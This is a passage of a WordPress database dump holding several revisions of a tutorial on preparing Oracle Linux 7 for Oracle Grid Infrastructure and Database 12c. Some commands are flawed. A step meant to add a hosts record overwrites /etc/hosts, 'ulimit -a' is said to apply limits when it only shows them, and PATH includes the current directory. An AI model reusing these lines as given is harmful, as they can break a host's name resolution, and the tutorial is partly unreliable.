65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:40:28','2020-02-02 09:40:28','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(38,2,'2020-02-02 09:42:02','2020-02-02 09:42:02','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br>\n<code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install kmod-oracleasm -y \nyum install oracleasm-support -y\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br>\n<code>\necho \"IP hostname hostname.domain\" > /etc/hosts\n</code><br>\nyou may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[ul]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nSHMALL = TOTAL RAM IN BYTES / PAGE_SIZE<br>\nSHMMAX = HALF OF TOTAL RAM IN BYTES<br>\nSHMMNI = PAGE_SIZE<br><br>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br>\n<code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br>\n<code>\npasswd oracle\npasswd grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:42:02','2020-02-02 09:42:02','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(39,2,'2020-02-02 09:47:17','2020-02-02 09:47:17','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br>\n<code>\nyum install -y cloog-ppl libXxf86misc<br/>\nyum install -y compat-libcap1 libXxf86vm<br/>\nyum install -y compat-libstdc++-33 libaio-devel<br/>\nyum install -y cpp libdmx<br/>\nyum install -y gcc libstdc++-devel<br/>\nyum install -y gcc-c++ mpfr<br/>\nyum install -y glibc-devel make<br/>\nyum install -y glibc-headers ppl<br/>\nyum install -y kernel-headers xorg-x11-utils<br/>\nyum install -y libXmu xorg-x11-xauth<br/>\nyum install -y libXt libXv<br/>\nyum install -y ksh libXxf86dga<br/>\nyum install -y elfutils-libelf-devel<br/>\nyum install -y sysstat<br/>\nyum install -y smartmontools<br/>\nyum install -y nfs-utils<br/>\nyum install -y unzip<br/>\nyum install -y net-tools<br/>\nyum install -y kmod-oracleasm<br/> \nyum install -y oracleasm-support<br/>\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br>\n<code>\necho \"IP hostname hostname.domain\" > /etc/hosts\n</code><br>\nyou may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[ul]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nSHMALL = TOTAL RAM IN BYTES / PAGE_SIZE<br>\nSHMMAX = HALF OF TOTAL RAM IN BYTES<br>\nSHMMNI = PAGE_SIZE<br><br>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf<br/><br/>\n\nvm.swappiness = 0<br/>\nvm.dirty_background_ratio = 3<br/>\nvm.dirty_ratio = 80<br/>\nvm.dirty_expire_centisecs = 500<br/>\nvm.dirty_writeback_centisecs = 100<br/>\nkernel.shmmax = <b>SHMMAX </b><br/>\nkernel.shmall = <b>SHMALL </b><br/>\nkernel.shmmni = <b>SHMMNI </b><br/>\nkernel.sem = 250 32000 100 128<br/>\nnet.ipv4.ip_local_port_range = 9000 65500<br/>\nnet.core.rmem_default = 262144<br/>\nnet.core.rmem_max = 4194304<br/>\nnet.core.wmem_default = 262144<br/>\nnet.core.wmem_max = 1048576<br/>\nfs.aio-max-nr = 1048576<br/>\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall<br/>\ngroupadd dba<br/>\ngroupadd asmdba<br/>\ngroupadd asmoper<br/>\ngroupadd asmadmin<br/>\ngroupadd oper<br/>\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle<br/>\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid<br/>\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br>\n<code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle<br/>\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid<br/>\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br>\n<code>\npasswd oracle<br/>\npasswd grid<br/>\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01<br/>\nchown -R oracle:oinstall /u01 <br/>\nmkdir /u01/crs<br/>\nmkdir /u01/crs/grid<br/>\nchown -R grid:oinstall /u01/crs <br/>\nmkdir /u01/app<br/>\nchown -R oracle:oinstall /u01/app<br/>\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid<br/>\nunzip /source/V839960-01.zip -d /home/oracle<br/>\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047<br/>\noracle hard nproc 16384<br/>\noracle soft nofile 1024<br/>\noracle hard nofile 65536<br/>\noracle soft stack 10240<br/>\noracle hard stack 32768<br/>\ngrid soft nproc 2047<br/>\ngrid hard nproc 16384<br/>\ngrid soft nofile 1024<br/>\ngrid hard nofile 65536<br/>\ngrid soft stack 10240<br/>\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i<br/>\nConfiguring the Oracle ASM library driver.<br/>\n\nThis will configure the on-boot properties of the Oracle ASM library<br/>\ndriver. The following questions will determine whether the driver is<br/>\nloaded on boot and what permissions it will have. The current values<br/>\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an<br/>\nanswer will keep that current value. Ctrl-C will abort.<br/>\n\nDefault user to own the driver interface [grid]: <b>grid</b><br/>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b><br/>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b><br/>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b><br/>\nWriting Oracle ASM library driver configuration: done<br/>\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service<br/>\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1<br/>\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2<br/>\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks<br/>\n/usr/sbin/oracleasm listdisks<br/>\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile<br/>\n# Get the aliases and functions<br/>\nif [ -f ~/.bashrc ]; then<br/>\n . ~/.bashrc<br/>\nfi<br/>\n# User specific environment and startup programs<br/>\nexport ORACLE_BASE=/u01/crs/oracle<br/>\nexport ORACLE_HOME=/u01/crs/grid<br/>\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data<br/>\nexport TNS_ADMIN=$ORACLE_HOME/network/admin<br/>\nexport ORACLE_DOC=$ORACLE_HOME/doc<br/>\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256<br/>\nexport TMPDIR=/tmp<br/>\nexport TMP=/tmp<br/>\nexport TZ=Asia/Tehran<br/>\nexport ORACLE_SID=+ASM<br/>\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg<br/>\nexport ORACLE_UNQNAME=dbtest12<br/>\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local<br/>\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.<br/>\nexport OWB_HOME=$ORACLE_HOME<br/>\nunset USERNAME<br/>\necho \".profile has been DONE successfully\"<br/>\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid<br/>\n./gridSetup.sh<br/>\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:47:17','2020-02-02 09:47:17','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(41,2,'2020-02-02 09:57:41','2020-02-02 09:57:41','','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:57:41','2020-02-02 09:57:41','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(42,2,'2020-02-02 09:58:50','2020-02-02 09:58:50','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>yum install -y cloog-ppl libXxf86misc<br>\nyum install -y compat-libcap1 libXxf86vm<br>\nyum install -y compat-libstdc++-33 libaio-devel<br>\nyum install -y cpp libdmx<br>\nyum install -y gcc libstdc++-devel<br>\nyum install -y gcc-c++ mpfr<br>\nyum install -y glibc-devel make<br>\nyum install -y glibc-headers ppl<br>\nyum install -y kernel-headers xorg-x11-utils<br>\nyum install -y libXmu xorg-x11-xauth<br>\nyum install -y libXt libXv<br>\nyum install -y ksh libXxf86dga<br>\nyum install -y elfutils-libelf-devel<br>\nyum install -y sysstat<br>\nyum install -y smartmontools<br>\nyum install -y nfs-utils<br>\nyum install -y unzip<br>\nyum install -y net-tools<br>\nyum install -y kmod-oracleasm <br>\nyum install -y oracleasm-support</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>echo \"IP hostname hostname.domain\" > /etc/hosts</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[ul]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nSHMALL = TOTAL RAM IN BYTES / PAGE_SIZE<br>\nSHMMAX = HALF OF TOTAL RAM IN BYTES<br>\nSHMMNI = PAGE_SIZE<br><br>\nto determine RAM size in bytes, you can use free command:\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>free -b</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>vi /etc/sysctl.conf</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>vm.swappiness = 0<br>\nvm.dirty_background_ratio = 3<br>\nvm.dirty_ratio = 80<br>\nvm.dirty_expire_centisecs = 500<br>\nvm.dirty_writeback_centisecs = 100<br>\nkernel.shmmax = <strong>SHMMAX </strong><br>\nkernel.shmall = <strong>SHMALL </strong><br>\nkernel.shmmni = <strong>SHMMNI </strong><br>\nkernel.sem = 250 32000 100 128<br>\nnet.ipv4.ip_local_port_range = 9000 65500<br>\nnet.core.rmem_default = 262144<br>\nnet.core.rmem_max = 4194304<br>\nnet.core.wmem_default = 262144<br>\nnet.core.wmem_max = 1048576<br>\nfs.aio-max-nr = 1048576<br>\nfs.file-max = 6815744</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>sysctl -p</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>groupadd oinstall<br>\ngroupadd dba<br>\ngroupadd asmdba<br>\ngroupadd asmoper<br>\ngroupadd asmadmin<br>\ngroupadd oper<br>\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle<br>\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>usermod -g oinstall -G dba,oper,asmdba,asmoper oracle<br>\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>passwd oracle<br>\npasswd grid</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>mkdir /u01<br>\nchown -R oracle:oinstall /u01 <br>\nmkdir /u01/crs<br>\nmkdir /u01/crs/grid<br>\nchown -R grid:oinstall /u01/crs <br>\nmkdir /u01/app<br>\nchown -R oracle:oinstall /u01/app</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>unzip /source/V840012-01.zip -d /u01/crs/grid<br>\nunzip /source/V839960-01.zip -d /home/oracle</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to install an rpm file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>rpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>vi /etc/security/limits.d/99-grid-oracle-limits.conf</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>oracle soft nproc 2047<br>\noracle hard nproc 16384<br>\noracle soft nofile 1024<br>\noracle hard nofile 65536<br>\noracle soft stack 10240<br>\noracle hard stack 32768<br>\ngrid soft nproc 2047<br>\ngrid hard nproc 16384<br>\ngrid soft nofile 1024<br>\ngrid hard nofile 65536<br>\ngrid soft stack 10240<br>\ngrid hard stack 32768</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ulimit -a </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>/usr/sbin/oracleasm configure -i<br>\nConfiguring the Oracle ASM library driver.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This will configure the on-boot properties of the Oracle ASM library<br>\ndriver. The following questions will determine whether the driver is<br>\nloaded on boot and what permissions it will have. The current values<br>\nwill be shown in brackets (\'[]\'). Hitting without typing an<br>\nanswer will keep that current value. Ctrl-C will abort.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Default user to own the driver interface [grid]: <strong>grid</strong><br>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong><br>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong><br>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong><br>\nWriting Oracle ASM library driver configuration: done</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>systemctl enable oracleasm.service<br>\nsystemctl start oracleasm.service</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1<br>\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2<br>\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>/usr/sbin/oracleasm scandisks<br>\n/usr/sbin/oracleasm listdisks</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>vi /home/grid/.bash_profile</p>\n<!-- /wp:paragraph -->\n\n<!-- 